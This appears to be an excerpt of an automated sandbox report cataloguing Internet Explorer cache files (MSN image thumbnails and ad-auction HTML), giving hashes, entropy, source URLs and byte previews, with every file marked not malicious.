IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d6XfP.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...e.K.w.....d.hp.....l..u...or,Ac..%.>.....y...!Z..\|.X..X../o.[....!_l..E.kh...p)$#.{....F...#...J...}1.>z..!...oI.J.dP...m$..i........H.c......h{h%..`I8'..:S.%.6_.E .R..y......... m2m...=h... ."p.\|.;.\..JE.........?....R....S..!.......Ti.[\.....s.j.).Rd:.Z\..-...).....z......8..3e..%G'....l$....O.B.[.I..D..T...ROb.dY-....G(....9.x&w..=...U..'.4.....p@...8.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BB1d6Yit[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	6532
Entropy (8bit):	7.910435152750822
Encrypted:	false
SSDEEP:	96:BGAaEncC57ebhHcD5Sk5j3HJPKaIaJYJG8eG692I2fQVbSU6MjdIiBaC8keGm0/+:BC05x3pvIJG8e/2tfcaMjZBykecpM
MD5:	05B6B2C0E60E58E7D1D35966010066B4
SHA1:	85BBD8C68E76E2DF3EFFE129F709185A3BDA3453
SHA-256:	55B0C79937B0793F6EA2437F36E4ED56AE70BABDA2E355A21D20163F11B2B894
SHA-512:	92EA160A28D3C5CBE53DE2624C1A8A904F969D54433C2B00A4353E7B673F47EC9862D201448CF6A64B3F4F203100EB691A8C1C3A730CE8873DB0CF390B6A2B76
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d6Yit.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=582&y=257
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..#.c.T....y&!n..(....V..Qv.}I..b......@.....ReFx......aQ=.I......\TW..\|...Z.N.w.g%..j..u.. Y..".;.+I4.,....`..\|...B.3Y].t.Ng.<.D.)..c.]....B.t.Qd.#.iQ..O:$m.V....R..V.........T.Sj..V...z`Q..8.... ......Zx.NEB.9.D.i..xA.+>...<V..U..EAV9;.m...iLR`..o.......{.......aR.I..-....Z..Z9..r....s...........t#..Z\....N...awG:...[.p\|....G...'8.Rs...-.=z...gg4

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BB1d6YmM[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	10894
Entropy (8bit):	7.606431540987355
Encrypted:	false
SSDEEP:	192:BpJs09bXuMXisIN2dCa7Ofs2JG256k6DLoYrSuzkaOCz06rkM:7JFrNisCa74scZ5sHoKSuAaOc0gkM
MD5:	EAFC47D9C545A52937D490825F7224B6
SHA1:	6769A1115744EB6217FE883EF398EF6EBC405E04
SHA-256:	8328D0D7788E887272175F6D1F99B88218C9A7E01B8A8FCA4F87DEBA0C253EEE
SHA-512:	B2C9DBF25BD50C04B9A571A296E9930EF9AFCE905204CA8D704D4942E52B4F964C9EAE23536CBCB015A55F5D8F6A05853D2A5651695F33E79C287C9E013678C2
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d6YmM.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1886&y=1441
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...ZJZ..QE......QE..QE..QE..RQE.-%.P..IK@..Q@..Q@..Q@..Q@..R..Q@.O,]FO*1.R:26.`..^....V.8....^.....))h...(...(...(...(...(...(...(...(....J.Z(...(....Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..(..R.P.QE..(...)h...(.......)i(...(.......))h...(...(...(......fp.!b}...K2.P0x..Q..3..-tW.4...\..3........:.q....d.S....].6n..=..].H....J.w]..4\,y.!.6..A..S..3....."..[c.8.M...H...8..c.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BB1d6e6G[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	19052
Entropy (8bit):	7.949286828355161
Encrypted:	false
SSDEEP:	384:Oc8ldplw6VgkhxgbQ3JEZlKmVNd2UxP/ZvWG2LFyBIRfsmev+cem0l:Oc8ldpLbQbQ5mK+32U0+mBBjl
MD5:	087F8144F3CF70B45253D4C3DC61319A
SHA1:	7A1D7AF27CAF14E3FB95497E68D2A1B061ADA252
SHA-256:	59D768125B49A3B5464B3E682AB0E6B82D42F849EB80FDB89DB7334D6FEB1505
SHA-512:	732101E1C1814F12857D6C4206C5C1CDA4D60A79B2FE1E8EFAAB6FEF52175949475076E078057B89EE966132E218982D2C75AE2EE848F3B8C42E98EC0F140E26
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d6e6G.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..J(....)....Z+.M.........wJ....w..:V..-..P1h.....L.E....J.(..`.QI@.E%....(.AE....QE.%.Q@..Q@..Q@.%.P..IE..f...Z)(..h.K.....&i.K...V=.."..{4........;"!i.*.$...;.Z..K.)..%'-.P....A.]....q,c..I.0>......D.....x...YB..g...6..H.:6....... '..`.^.a{m...wg(.).A.....bE.(...(.%...f...Z3IE..(....Q@..Q@.%-C%.O.I:+I..=h.-.Z..i...!..H..u.4\..(..QE..QE..f.J(.h....(.....L...IE.y.g

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BB1d72uI[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 444x444, segment length 16, baseline, precision 8, 310x166, frames 3
Category:	downloaded
Size (bytes):	6471
Entropy (8bit):	7.923093057218889
Encrypted:	false
SSDEEP:	192:hFkdtzIS9h/oukIua4m2tOyfwLni7BS25:Pk/zIu/5sm2tOyfUnGSo
MD5:	A97612BD4E8D7B68929D52302DAADFCE
SHA1:	F5FFC0912A42E59C5BDB84ADCF5F669BFFB75D09
SHA-256:	CA3668C4B8D94CF65B6DC4234C7223859B9A7FAF2E2A4CADF87EB77FBBCE61FD
SHA-512:	0D688DDD065EFD4F592EC97552279D0A54D21D4B7D699A1D37AAE5CC4D1FBFD050C709D4D90D5574480E471D382CFE4D2E71CC109C2021DF5913B0F79899D91A
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d72uI.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..jZsB.p..............T$T...7c...#..92..kJ...v..!S.W.V+#n.)6.....>..5...h,s.:;.T\|..J..*q.3L...2j........T...<K.@@.I`;:..+.F.....Z0..{.N.. .}....=....Yi).,f"}Z...h.SE.bS..\.a.$v...........\|.O.oQ.b..f..L..s.<...u.WQ.Ha.....PZ....K..RW..Sx..........7.u..4..F.(+......j.J.,4..!.......~"j.s..8..V.n?.......in.{..&..<.Y..MCR.6.....e.".E..I.....c%..v..).v.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BB1d75DX[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	12185
Entropy (8bit):	7.929534819361302
Encrypted:	false
SSDEEP:	192:BYkiiZ3iZaUQGbU7TgZpEe1NZhvKTHp8bZQEDMobN6hW59M/7wl+jkTiJ3nl7Xqj:ekieyZaKbKgzFrKrFop6hW8zC+37Xw
MD5:	41E54BA79933FDCFCA702D670B90EF5C
SHA1:	2FC4EA1B7E234E245EF07AE65710C0BE77C6BBF1
SHA-256:	4346852E3CFAA3635E699B3314775CAEA4B1E7E074B6B6F9D832BCB5CF3E27C7
SHA-512:	60F5A13A8AB6E6ACDDF7E33C746ED9BB5D7DFA1FC49347754C1984D5E36842FCE8523DB9E69C9460FC816CCE79D14A097968A22D7A252637ACE5D987E92643FB
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d75DX.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(..F7.b.E.3......E.aZi..)..""..T.R.@.b..)..i..)......Y....q.PH=..P..z..zK.].6..v.X5H.PW.{.i..r.JQ..S..,..A,:.M+Y..c.,X.n=)Y.....p..;X....v2).[z.....c.a,.}.d. .........h`:{I$a...T..~.......V.....UB....9 U...I\|.vfS..E.....o.F:.~.V..0..;g...~..Z.}.C.C....*....[.P......b........T..s.T..dq.....SIj...G.=J.X..4Fx..g.....x.......j.De.b!y=....v....3......S5.A..L....<P.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BB1d76a5[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	14310
Entropy (8bit):	7.9535873343135535
Encrypted:	false
SSDEEP:	384:OLGdseIVv76QBuTcfdOk5s072at2jjpDihHyiha54clSKw:OLUsnjfB6g1D2u2Rm/q44SKw
MD5:	F48A2936FA0E1C9E8BF339A947158887
SHA1:	56080EB25ED1B55C65048E0DAA2617895FD4510E
SHA-256:	1D540AB71DE3D2565C93C59C75BD1ACC2FC31E78664A789E1227C05A8A313286
SHA-512:	F20004A84C792FEFFA9983CCD39C873C35C3D28FAC463AEEC269EE9B25A74D276480943DC3E83187947BAC3D94308BDDE33C90AE052C64611CE3E435ACAA3389
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d76a5.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=636&y=119
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?........K{.GE.t\T.F..I...\...t..5g..~..W..jT_z...4..h ...).........1.\P.....he9..-..sH..&.{...4.k.z.......f.=.=.gEm}.].R.G.....\...s....2...Y..bYR..==+GG.4..#R..^.OJ.....y1.U..g.T.#.a....}J&.X...P......M..'..1Z.;....N>.bj.p&...1C.G8....T!m....w....j..i.]YJnl.P~.}kN....$gkD.9.......B..=kQ...*.....3.....w.(........z9..L.CP$du5j(..3.F......tO.{T_g^.T

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BB1d77gW[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 300x250, frames 3
Category:	downloaded
Size (bytes):	14398
Entropy (8bit):	7.95721440005899
Encrypted:	false
SSDEEP:	384:ZnOTj463AhBn72pzk77A0HiVgagfOzhPm:Znu440BcG8wYNPte
MD5:	408257627267952F206CE56B6287B35A
SHA1:	D72BF56068278443614F6378CEF2B27239B1F42E
SHA-256:	2BA59826B465DEE89592861C285CE61A22D18ED9CA39CDBD8EE86CA305C50A8F
SHA-512:	59F4D608D2A97C0D1CE724136B497C895DA4B06E751660CB2BB2AC44919A0585276D075B8C654E058378FFA9A01E4D052878100408678DB8D079A2DC9DA28CC3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d77gW.img?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.d....6;..R..j..31F+O...`...bm<\|......,..EK..)..4..4..7..ToT.G..Kp{Sg.R...By.2..........v.{&...v...G.m.kK.s.6....i3................#L.....S=.B..A..E.H.....#5m.R=...m....B.z.....g${qI.!s..ATo...Ew#O.O.n...}..y..........#....... 7...."'....\S..z.[{)w#.v8k+S..T.Uy@......&.`?QR.y.....z....:....pma~Z8....s.67...(r...R.mr.YE..u.p:...P3.v...1H.}."..4K......8..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BB1kKVy[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	863
Entropy (8bit):	7.63569608010223
Encrypted:	false
SSDEEP:	24:Qr64gdmEMBzvcF9u2xN99OAnpLgTrc/PmWfmw2F3:GS2NcFscfOKLgTChfH2p
MD5:	03134525726F04B87A0E34490D73D3AD
SHA1:	61EDFDF0E3C7B2C9C2FF6BBA0C1D19D6C14C86E1
SHA-256:	A37BE23752B8EBB28F060CD4EC469CC9C937A2CE62D1DF406AECE91C9C12B24D
SHA-512:	DDD913A770CC7F3973E97D98BB68837061D784D4DEB17792D625965228F870147A084719E8E63D97D7D840920845230098648644618E5EFD6377A9021A347569
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kKVy.img?m=6&o=true&u=true&n=true&w=30&h=30
Preview:	.PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d....IDATHK.]H.Q...].A...]hb...JX3..j..,...Fw.n.n.\.v.].Eue....+.@...Skj.....p.....{..yP.N.N...`........y.<y.;l.t.Q.T\|T$.-!..H.)B..Dcl...9g.6.HD>Y..$...A!.c. .z...(.6..F.1K..9.....j.Z..bH.D...&B.dm..T..YD..LG.H5..G..&..%.tb......T..yD...Bb.....QFh.L.....R..=......())9.L&/j4.J<.$I..e.......k....5.0^....VP.=z0x.cqq.K..t...N....D"A333444.............qF...Q3..U.T.uE........g#..~..766.0..\|J..X.zzzhbb.....`.UR.l..$yQ.R,........8(.w.v.]...W..R.em.Z..UUU..AA.....`0hv.\.BN..c.3.e2=..>!...T....O>...zwYYY.....f#$ f..L.............l.v.....7pAT".0...w..8...e....Rs..f......4.......ews=...\|d@.Kw.:vj..v..H....R<.....6??_...X........~.X,[2.`........<.h..x.a....Tn6...;.........H.Lmm.^.. ..F.4<<.{=........N..2......-......^.r.<...?....C.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BB6Ma4a[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	396
Entropy (8bit):	6.789155851158018
Encrypted:	false
SSDEEP:	6:6v/lhPkR/CnFPFaUSs1venewS8cJY1pXVhk5Ywr+hrYYg5Y2dFSkjhT5uMEjrTp:6v/78/kFPFnXleeH8YY9yEMpyk3Tc
MD5:	6D4A6F49A9B752ED252A81E201B7DB38
SHA1:	765E36638581717C254DB61456060B5A3103863A
SHA-256:	500064FB54947219AB4D34F963068E2DE52647CF74A03943A63DC5A51847F588
SHA-512:	34E44D7ECB99193427AA5F93EFC27ABC1D552CA58A391506ACA0B166D3831908675F764F25A698A064A8DA01E1F7F58FE7A6A40C924B99706EC9135540968F1A
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....!IDAT8Oc\|. ..?...\|.UA....GP.`\|. ......E...b.....&.>..x.h....c.....g.N...?5.1.8p.....>1..p...0.EA.A...0...cC/...0Ai8...._....p.....)....2...AE....Y?.......8p..d......$1l.%.8.<.6..Lf..a.........%.....-.q...8...4...."...`5..G!.\|..L....p8 ...p.......P....,..l.(..C]@L.#....P...)......8......[.7MZ.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BBMQmHU[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	409
Entropy (8bit):	7.218604367937237
Encrypted:	false
SSDEEP:	12:6v/78/qofFi4s1Hhotz7jvIUAvrCNXDqOsan6r:gDw7jvIUAvmNzdBng
MD5:	C5FE20B40E638C628980363E8F1D8872
SHA1:	2EAA8B3D723D2CB4F8B0DEED4E58CE7D688C1EE7
SHA-256:	4A7727414A6CDCD85EC0B9A56AF481F50CA410D234E65078C43F640EC392332C
SHA-512:	DA41CDFF3ADB6237C7739D17E45E4A4A41C18AAE0D3C26F31AC699549B5F612FA878982F8E7440666A13F54AF48DC99C29C50900E2AAA5F677B9D216BBE387FF
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMQmHU.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.R1N.A..}.J.A$.+.%..<.J..H..T.?..\..$? ?...%-J..f.Z..h.T..4.....K...L..Q./..RI.B.z..VQ......5-.H..)3OT}.,5...C.L....P..f>...A!.T..^.Q..:r.ai....=M`W(R..n..;x...76&.P.nm..+.+..XUc..IZ..lN.+-.e...9r.&......[\|......G.......2Lx..K.3G.....b.\...?..\|C.2.W.o...w.{k..6L%.......t. ..@@..h......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BBXXVfm[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	823
Entropy (8bit):	7.627857860653524
Encrypted:	false
SSDEEP:	24:U/6IPdppmpWEL+O4TCagyP79AyECQdYTVc6ozvqE435/kc:U/6Ilpa4T/0IVKdI1
MD5:	C457956A3F2070F422DD1CC883FB4DFB
SHA1:	67658594284D733BB3EE7951FE3D6EE6EB39C8E2
SHA-256:	90E75C3A88CD566D8C3A39169B1370BBE5509BCBF8270AF73DB9F373C145C897
SHA-512:	FE9D1C3F20291DFB59B0CEF343453E288394C63EF1BE4FF2E12F3F9F2C871452677B8346604E3C15A241F11CC7FEB0B91A2F3C9A2A67E446A5B4A37D331BCEA3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBXXVfm.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.SKH.a....g.....E..j..B7..B..... .L)q.&t..\EA. A.. D.. 7..M.(#A.t\|&..z.3w.....Zu.;s.9.;................i.o.P.:....D.+...!.....4.g.J..W..F.mC..%tt0I.j..J..kU.o...0.....qk4....!>.>...;...Q..".5$..oaX..>..:..Ebl..;.{s...W.v..#k}].)}......U.'....R..(..4..n..dp......v.@!..^G0....A..j.}..h+..t.....<..q...6.8.jG......E%...F.......ZT....+....-.R.....M.. .A.wM........+.F}.....`-+u....yf..h,.KB.0......;I.'..E.(...2VR;.V...u...cM..}....r\.!.J>%......8f"....q.\|...i..8..I1..f.3p.@ $a.k.A...3..I.O.Dj...}..PY.5`...$..y.Z..t... ...\|.E.zp............>f..<z.If...9Z;....O.^B.Q..-.C....=.......v?@).Q..b...3....`.9d.D5.......X.....Za.......!#h.. \&s....M3Qa..%.p..\1..xE.>..-J.._........?..?5e......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\a8a064[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 28 x 28
Category:	downloaded
Size (bytes):	16360
Entropy (8bit):	7.019403238999426
Encrypted:	false
SSDEEP:	384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
MD5:	3CC1C4952C8DC47B76BE62DC076CE3EB
SHA1:	65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
SHA-256:	10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
SHA-512:	5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Preview:	GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........\|~\|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........\|~\|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\auction[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	24829
Entropy (8bit):	5.646772632112698
Encrypted:	false
SSDEEP:	384:obup1MXkDqokQg1Ppy+/13lykulkkpMMmd3rkOpYfrVkf7RaLV6o7r9R5ZR7GpN2:obuvYkD9kQyo2V7dp4728LwQ9zoL8v
MD5:	9C6AB80193363DF0883639BD0ACC45E3
SHA1:	0694BB1A4AB702A93FC788120CDFF99D31442EA5
SHA-256:	857BF4A40DF0A8BF837988E624DD7D2ACC98694533219096BB1AAEFD046804BF
SHA-512:	7D26E4B7AF254923ED35A2162761C2201F7C1B90757F06BAA553280556EDEC9B600729432CFFD4C249D1A16A50FD841C7FD7304F94A290E1CF428043A2FFF734
Malicious:	false
IE Cache URL:	https://srtb.msn.com/auction?a=de-ch&b=c67f6319e19a4515a42859970c243f65&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&_=1611719053380
Preview:	.<script id="sam-metadata" type="text/html" data-json="{"optout":{"msaOptOut":false,"browserOptOut":false},"taboola":{"sessionId":"v2_65a09ea2a4e372fb07666907a195f8c0_67905ab5-2a48-4a7d-a52b-e89ed5d1ab13-tuct709e880_1611686656_1611686656_CIi3jgYQr4c_GK3Hsbmp-82iSSABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAQ"},"tbsessionid":"v2_65a09ea2a4e372fb07666907a195f8c0_67905ab5-2a48-4a7d-a52b-e89ed5d1ab13-tuct709e880_1611686656_1611686656_CIi3jgYQr4c_GK3Hsbmp-82iSSABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAQ","pageViewId":"c67f6319e19a4515a42859970c243f65","RequestLevelBeaconUrls":[]}">.</script>.<li class="triptych serversidenativead hasimage " data-json="{"tvb":[],"trb":[],"tjb":[],"p":"taboola","e":true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="3" data-viewability="">.<

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20808
Entropy (8bit):	5.301467861497523
Encrypted:	false
SSDEEP:	384:2MjAGcVXlblcqnzleZSug2f5vzBgF3OZO4QWwY4RXrqt:p86qhbz2RmF3Os4QWwY4RXrqt
MD5:	73455F3084C7DE1D4CCBA2D73F6CBA70
SHA1:	E12E181AFD2F73C896957919C3D0DF4254DDCC7B
SHA-256:	8050E2D5597F872F3514B304C42E0A378F6B54060A2CA93A83D726250D65125A
SHA-512:	78A2A14326FFE60D50E3F0EED2D3C9A6F109185C8A943C075A8953C3E7C22BDB48736DE1F832F0AA85FC29B083AD1CF5613E5FE841309FA5234E58BBBA980467
Malicious:	false
